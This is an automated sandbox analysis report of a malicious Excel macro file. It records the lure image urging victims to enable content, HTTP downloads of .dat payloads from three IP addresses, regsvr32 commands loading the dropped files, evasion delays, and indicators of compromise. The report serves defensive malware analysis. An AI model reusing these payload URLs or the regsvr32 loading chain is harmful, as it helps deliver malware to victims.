
Windows Analysis Report Permission-1532161794-06252021.xlsm

Overview

General Information

Sample Name: Permission-1532161794-06252021.xlsm
Analysis ID: 440649
MD5: bff78ca6421651b824c41ff73cd63a4d
SHA1: 8a439fe82292dfb61092daa32af6f0152400f002
SHA256: b4c8a880fae666add98f9a871210d75f7addd4a00a334fb758c791c5ad1d3711
Tags: xlsm

Detection

Hidden Macro 4.0
Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1144 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2740 cmdline: regsvr32 ..\Kro.fis MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2636 cmdline: regsvr32 ..\Kro.fis1 MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2924 cmdline: regsvr32 ..\Kro.fis2 MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team | Data: Command: regsvr32 ..\Kro.fis, CommandLine: regsvr32 ..\Kro.fis, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1144, ProcessCommandLine: regsvr32 ..\Kro.fis, ProcessId: 2740

Signature Overview

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 190.14.37.3:80
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 185.240.103.219:80
Source: global traffic | HTTP traffic detected: GET /44372.7671056713.dat HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 190.14.37.3 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /44372.7671056713.dat HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 185.183.99.120 | Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 185.240.103.219 (6 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 190.14.37.3 (6 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 185.183.99.120 (6 occurrences)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1D80F52D.jpg
Source: regsvr32.exe, 00000003.00000002.2149692188.0000000004880000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: regsvr32.exe, 00000003.00000002.2149692188.0000000004880000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: regsvr32.exe, 00000003.00000002.2149692188.0000000004880000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: regsvr32.exe, 00000003.00000002.2150197240.0000000004A67000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130963430.0000000004997000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: regsvr32.exe, 00000003.00000002.2150197240.0000000004A67000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130963430.0000000004997000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000003.00000002.2146852536.0000000003950000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127425533.00000000039A0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.2146134146.0000000001C50000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2126766598.0000000001C20000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2107504006.0000000001DB0000.00000002.00000001.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000003.00000002.2150197240.0000000004A67000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130963430.0000000004997000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: regsvr32.exe, 00000003.00000002.2150197240.0000000004A67000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130963430.0000000004997000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000003.00000002.2146852536.0000000003950000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127425533.00000000039A0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2108101564.0000000003990000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000003.00000002.2149692188.0000000004880000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: regsvr32.exe, 00000003.00000002.2150197240.0000000004A67000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130963430.0000000004997000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: regsvr32.exe, 00000003.00000002.2149692188.0000000004880000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable Editing from the ' yellow bar above. 21 22 G) PROTECTED VIEW Be careful-files from the In
Source: Screenshot number: 4 | Screenshot OCR: Enable Content 30 31 32 33 34 35 36 37 38 , Id 1 p pi Sheetl i q |1|| P A EC DO I '0
Source: Screenshot number: 8 | Screenshot OCR: Enable Editing from the ' yellow bar above. 21 :: G) PROTECTED VIEW Be careful-files from the In
Source: Screenshot number: 8 | Screenshot OCR: Enable Content 30 31 32 33 34 35 36 37 38 , Id 1 p pi Sheetl i q |1|| P A 'g ,,J
Source: Document image extraction number: 0 | Screenshot OCR: Enable Editing from the yellow bar above. PROTECTED VIEW Be careful-files from the Internet can
Source: Document image extraction number: 0 | Screenshot OCR: Enable Content
Source: Document image extraction number: 1 | Screenshot OCR: Enable Editing from the yellow bar above. (i) PROTECTED VIEW Be careful-files from the Internet ca
Source: Document image extraction number: 1 | Screenshot OCR: Enable Content
Found Excel 4.0 Macro with suspicious formulas
Source: Permission-1532161794-06252021.xlsm | Initial sample: EXEC
Source: regsvr32.exe, 00000003.00000002.2149692188.0000000004880000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal64.expl.evad.winXLSM@7/7@0/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Permission-1532161794-06252021.xlsm
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRC503.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis2
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: Permission-1532161794-06252021.xlsm | Initial sample: OLE zip file path = xl/media/image1.jpg
Source: Permission-1532161794-06252021.xlsm | Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Permission-1532161794-06252021.xlsm | Initial sample: OLE zip file path = xl/calcChain.xml
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (24 occurrences)
Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX (3 occurrences)
Source: C:\Windows\System32\regsvr32.exe TID: 2944 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 2384 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 2452 | Thread sleep time: -60000s >= -30000s

Mitre Att&ck Matrix

Techniques per tactic (the number in parentheses is the signature count the report attached to that technique):

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts
Execution: Scripting (1), Exploitation for Client Execution (22), At (Linux), At (Windows), Cron
Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
Privilege Escalation: Process Injection (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
Defense Evasion: Masquerading (1), Disable or Modify Tools (1), Virtualization/Sandbox Evasion (1), Process Injection (1), Scripting (1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets
Discovery: Virtualization/Sandbox Evasion (1), File and Directory Discovery (1), System Information Discovery (2), System Network Configuration Discovery, Remote System Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits
Command and Control: Non-Application Layer Protocol (1), Application Layer Protocol (11), Ingress Tool Transfer (2), Protocol Impersonation, Fallback Channels
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings

Behavior Graph


Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
Permission-1532161794-06252021.xlsm | 5% | Virustotal | -

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://190.14.37.3/44372.7671056713.dat | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://185.183.99.120/44372.7671056713.dat | 0% | Avira URL Cloud | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://190.14.37.3/44372.7671056713.dat | false | Avira URL Cloud: safe | unknown
http://185.183.99.120/44372.7671056713.dat | false | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | regsvr32.exe, 00000003.00000002.2150197240.0000000004A67000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130963430.0000000004997000.00000002.00000001.sdmp | false | - | high
http://www.windows.com/pctv. | regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmp | false | - | high
http://investor.msn.com | regsvr32.exe, 00000003.00000002.2149692188.0000000004880000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmp | false | - | high
http://www.msnbc.com/news/ticker.txt | regsvr32.exe, 00000003.00000002.2149692188.0000000004880000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmp | false | - | high
http://www.icra.org/vocabulary/. | regsvr32.exe, 00000003.00000002.2150197240.0000000004A67000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130963430.0000000004997000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | regsvr32.exe, 00000003.00000002.2146852536.0000000003950000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127425533.00000000039A0000.00000002.00000001.sdmp | false | - | high
http://investor.msn.com/ | regsvr32.exe, 00000003.00000002.2149692188.0000000004880000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmp | false | - | high
http://www.%s.comPA | regsvr32.exe, 00000003.00000002.2146852536.0000000003950000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127425533.00000000039A0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2108101564.0000000003990000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | regsvr32.exe, 00000003.00000002.2150197240.0000000004A67000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130963430.0000000004997000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | regsvr32.exe, 00000003.00000002.2149692188.0000000004880000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmp | false | - | high
http://servername/isapibackend.dll | regsvr32.exe, 00000003.00000002.2146134146.0000000001C50000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2126766598.0000000001C20000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2107504006.0000000001DB0000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
190.14.37.3 | unknown | Panama | 52469 | OffshoreRacksSAPA | false
185.183.99.120 | unknown | Netherlands | 60117 | HSAE | false
185.240.103.219 | unknown | Russian Federation | 57724 | DDOS-GUARDRU | false

                General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 440649
Start date: 25.06.2021
Start time: 18:24:20
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 0s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Permission-1532161794-06252021.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal64.expl.evad.winXLSM@7/7@0/3
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsm
• Found Word or Excel or PowerPoint or XPS Viewer
• Found warning dialog
• Click Ok
• Found warning dialog
• Click Ok
• Found warning dialog
• Click Ok
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe

                Simulations

                Behavior and APIs

Time | Type | Description
18:24:50 | API Interceptor | 3x Sleep call for process: regsvr32.exe modified

                Joe Sandbox View / Context

                IPs

Match | Associated Sample Name / URL | Detection | Context
190.14.37.3 | Permission-414467145-06252021.xlsm | malicious | 190.14.37.3/44372.593127662.dat
190.14.37.3 | Permission-414467145-06252021.xlsm | malicious | 190.14.37.3/44372.5879460648.dat
185.183.99.120 | Permission-414467145-06252021.xlsm | malicious | 185.183.99.120/44372.593127662.dat
185.183.99.120 | Permission-414467145-06252021.xlsm | malicious | 185.183.99.120/44372.5879460648.dat
185.240.103.219 | Permission-414467145-06252021.xlsm | malicious | 185.240.103.219/44372.593127662.dat
185.240.103.219 | Permission-414467145-06252021.xlsm | malicious | 185.240.103.219/44372.5879460648.dat

                Domains

                No context

                ASN

Match | Associated Sample Name / URL | Detection | Context
DDOS-GUARDRU | Permission-414467145-06252021.xlsm | malicious | 185.240.103.219
DDOS-GUARDRU | Permission-414467145-06252021.xlsm | malicious | 185.240.103.219
DDOS-GUARDRU | Decline-172917164-06242021.xlsm | malicious | 5.253.62.174
DDOS-GUARDRU | Decline-172917164-06242021.xlsm | malicious | 5.253.62.174
DDOS-GUARDRU | ForceNitro.exe | malicious | 185.178.208.135
DDOS-GUARDRU | PO#8076.exe | malicious | 185.129.100.112
DDOS-GUARDRU | Cancellation_Letter_2137859823_06112021.xlsm | malicious | 185.240.103.162
DDOS-GUARDRU | Cancellation_Letter_2137859823_06112021.xlsm | malicious | 185.240.103.162
DDOS-GUARDRU | jebDtHCePK9feGL.exe | malicious | 185.129.100.112
DDOS-GUARDRU | EDS03932,pdf.exe | malicious | 185.178.208.160
DDOS-GUARDRU | PO_29_00412.exe | malicious | 185.178.208.160
DDOS-GUARDRU | PO_29_00412.exe | malicious | 185.178.208.160
DDOS-GUARDRU | 12042021493876783,xlsx.exe | malicious | 185.178.208.160
DDOS-GUARDRU | Ref. PDF IGAPO17493.exe | malicious | 5.253.61.31
DDOS-GUARDRU | AxR7BY4wzz.exe | malicious | 185.178.208.189
DDOS-GUARDRU | SecuriteInfo.com.Trojan.Siggen12.41502.7197.exe | malicious | 185.178.208.189
DDOS-GUARDRU | #U041e#U0442#U043a#U0440#U044b#U0442#U044c www.sberbank.ru-0152 .htm | malicious | 185.129.100.100
DDOS-GUARDRU | Install.exe | malicious | 185.219.40.40
DDOS-GUARDRU | CHEAT.exe | malicious | 185.178.208.161
DDOS-GUARDRU | seed.exe | malicious | 185.219.40.40
OffshoreRacksSAPA | Permission-414467145-06252021.xlsm | malicious | 190.14.37.3
OffshoreRacksSAPA | Permission-414467145-06252021.xlsm | malicious | 190.14.37.3
OffshoreRacksSAPA | 4cDyOofgzT.xlsm | malicious | 190.14.37.2
OffshoreRacksSAPA | 4cDyOofgzT.xlsm | malicious | 190.14.37.2
OffshoreRacksSAPA | 341288734918_06172021.xlsm | malicious | 190.14.37.2
OffshoreRacksSAPA | 341288734918_06172021.xlsm | malicious | 190.14.37.2
OffshoreRacksSAPA | Rebate_247668103_06142021.xlsm | malicious | 190.14.37.135
OffshoreRacksSAPA | Rebate_247668103_06142021.xlsm | malicious | 190.14.37.135
OffshoreRacksSAPA | Rebate_1963763550_06142021.xlsm | malicious | 190.14.37.135
OffshoreRacksSAPA | Rebate_1963763550_06142021.xlsm | malicious | 190.14.37.135
OffshoreRacksSAPA | Rebate_234359500_06142021.xlsm | malicious | 190.14.37.135
OffshoreRacksSAPA | Rebate_234359500_06142021.xlsm | malicious | 190.14.37.135
OffshoreRacksSAPA | banUwVSwBY.xlsx | malicious | 190.14.37.134
OffshoreRacksSAPA | banUwVSwBY.xlsx | malicious | 190.14.37.134
OffshoreRacksSAPA | Rebate_18082425_05272021.xlsm | malicious | 190.14.37.102
OffshoreRacksSAPA | Rebate_18082425_05272021.xlsm | malicious | 190.14.37.102
OffshoreRacksSAPA | DEBT_06032021_861309073.xlsm | malicious | 190.14.37.121
OffshoreRacksSAPA | DEBT_06032021_861309073.xlsm | malicious | 190.14.37.121
OffshoreRacksSAPA | Rebate_854427061_05272021.xlsm | malicious | 190.14.37.102
OffshoreRacksSAPA | Rebate_854427061_05272021.xlsm | malicious | 190.14.37.102
HSAE | Permission-414467145-06252021.xlsm | malicious | 185.183.99.120
HSAE | Permission-414467145-06252021.xlsm | malicious | 185.183.99.120
HSAE | Decline-172917164-06242021.xlsm | malicious | 185.117.73.74
HSAE | Decline-172917164-06242021.xlsm | malicious | 185.117.73.74
HSAE | xa6FEoUw0W.dll | malicious | 188.116.36.211
HSAE | tszs3mwUbe.exe | malicious | 185.45.193.29
HSAE | pZ50mMKSLi.exe | malicious | 185.45.193.29
HSAE | qTnwCotzR9.exe | malicious | 185.45.193.29
HSAE | PwBsqWQ7jJ.exe | malicious | 185.45.193.29
HSAE | aGDehjYIws.exe | malicious | 185.198.57.204
HSAE | Tjhsm8p85Y.exe | malicious | 185.45.193.29
HSAE | T23HJFoN2Y.exe | malicious | 185.45.193.29
HSAE | i7NsO9mhTD.exe | malicious | 185.45.193.29
HSAE | o7w2HSi17V.exe | malicious | 185.141.27.225
HSAE | AB1CEF822F66D7B77574A21C8154D4A6E9FCD196A6659.exe | malicious | 185.198.57.204
HSAE | 4cDyOofgzT.xlsm | malicious | 194.36.189.154
HSAE | 4cDyOofgzT.xlsm | malicious | 194.36.189.154
HSAE | 341288734918_06172021.xlsm | malicious | 194.36.189.154
HSAE | 341288734918_06172021.xlsm | malicious
                • 194.36.189.154
                xax2K3BWhm.exeGet hashmaliciousBrowse
                • 185.45.192.246

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1D80F52D.jpg
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:[TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS6 (Windows), datetime=2021:02:11 21:11:18], baseline, precision 8, 1860x1000, frames 3
                Category:dropped
                Size (bytes):139381
                Entropy (8bit):7.677272725029824
                Encrypted:false
                SSDEEP:3072:CmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZOy:54P4346PgZw9gQat
                MD5:53918FB868F1540920FC189C6783FC7C
                SHA1:135CB103C5B5125C80285A83AE728B559313BADC
                SHA-256:7F6AD5212338A6586251AEF92D2543AA8E70C815FE0BF7ADDCE2C0A83D20A0B3
                SHA-512:31391EFC3D377EA32A537EF3DDCA41ABAF34C4C83CDFEF9A64D40DE219B88A293BE2BF01D6A5D2B23365513CB880020F37CA8E90506C41FB7FC8E42D4D641F51
                Malicious:false
                Reputation:low
                C:\Users\user\AppData\Local\Temp\6CCE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):153117
                Entropy (8bit):7.664485795476707
                Encrypted:false
                SSDEEP:3072:cnxmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZO4O4:cng4P4346PgZw9gQap
                MD5:85279074A41AD1C9174C9D03F19810B3
                SHA1:C4DBBDABD114B05AA56E8E00F9826B4868E2561F
                SHA-256:A48F6F68FA335FC5F5E84F57EDFEA73F577D234EE34D13810596283484A1633B
                SHA-512:BB369D87F0CBCB16D9B2B0974E1281BF0B8C3E870D7579DD55AB74C5DF7C0837865843F4F0B492AA4C183BBA351C91D1FCF113D689F6C62B642C5195B5393E41
                Malicious:false
                Reputation:low
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sat Jun 26 00:24:37 2021, atime=Sat Jun 26 00:24:37 2021, length=8192, window=hide
                Category:dropped
                Size (bytes):867
                Entropy (8bit):4.491100138549876
                Encrypted:false
                SSDEEP:12:85Qe+LgXg/XAlCPCHaXtB8XzB/WRlvX+WnicvbOdlbDtZ3YilMMEpxRljKiTdJP8:85I/XTd6jOxYeqvDv3q/rNru/
                MD5:BAAA1630EE771E146B0F7217074B5678
                SHA1:860C29F3299C61D700AB162973658C866F68B27E
                SHA-256:F45EBB66634B7D43E9F45E331E551A00314D32FD01A4FF762CEE5123282FC0DC
                SHA-512:3D8F8F945ED7C034A4791BF3969220D9C02E7623AC80651888CAFDE7C7F63F87BEC9D74644E12B2E850718D3CCD94CADFBC1BB6F7AA40CB3989ECCDEC080DDEF
                Malicious:false
                Reputation:low
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Permission-1532161794-06252021.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Sat Jun 26 00:24:37 2021, atime=Sat Jun 26 00:24:37 2021, length=153117, window=hide
                Category:dropped
                Size (bytes):2238
                Entropy (8bit):4.530521818280758
                Encrypted:false
                SSDEEP:48:8Zk/XT0jkK1RDJZ66R8/Qh2Zk/XT0jkK1RDJZ66R8/Q/:8Zk/XojkKWl/Qh2Zk/XojkKWl/Q/
                MD5:2FF094BE869E4C4FB1771A372D0AB4CB
                SHA1:CBA265A3449CEA0B7BD4D287681CA7EBA0DD59C8
                SHA-256:7AAF5F8953CE366C55150FA2748294CE39ABB7B7D6EF4A2E6C9293FDEFDFBFD4
                SHA-512:5CECA516F781A44DD0EC2789447C032C66F1FFE001EA9B7F189A48721EC689FA12817CAB3C2A116866AACB638D77495F0186E0FF41059C74758129954C8CE95F
                Malicious:false
                Reputation:low
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):145
                Entropy (8bit):4.723147476288188
                Encrypted:false
                SSDEEP:3:oyBVomxW+LxbLgIVTAXsUltLxbLgIVTAXsUlmxW+LxbLgIVTAXsUlv:djHbMoTAZ/FbMoTAZabMoTAZ1
                MD5:2B794DCA717665E095522B867972E337
                SHA1:E4C6872AF74D6866D0ECD036AAC3D400FB1C26B8
                SHA-256:AC0912D3AA6518006F9468C464A706D473CE49DDA61B0B553CAE5713F17B660C
                SHA-512:8F12A3A19EB076EAFAF6D71B07E869DAB6EB112B7CE9735868E736065B3242E0A2D5ADFBFFA01FDB0635A780B82E590B349010444F7A0CF161228BD57C2808B5
                Malicious:false
                Reputation:low
                Preview: Desktop.LNK=0..[misc]..Permission-1532161794-06252021.LNK=0..Permission-1532161794-06252021.LNK=0..[misc]..Permission-1532161794-06252021.LNK=0..
                C:\Users\user\Desktop\FCCE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):153117
                Entropy (8bit):7.664485795476707
                Encrypted:false
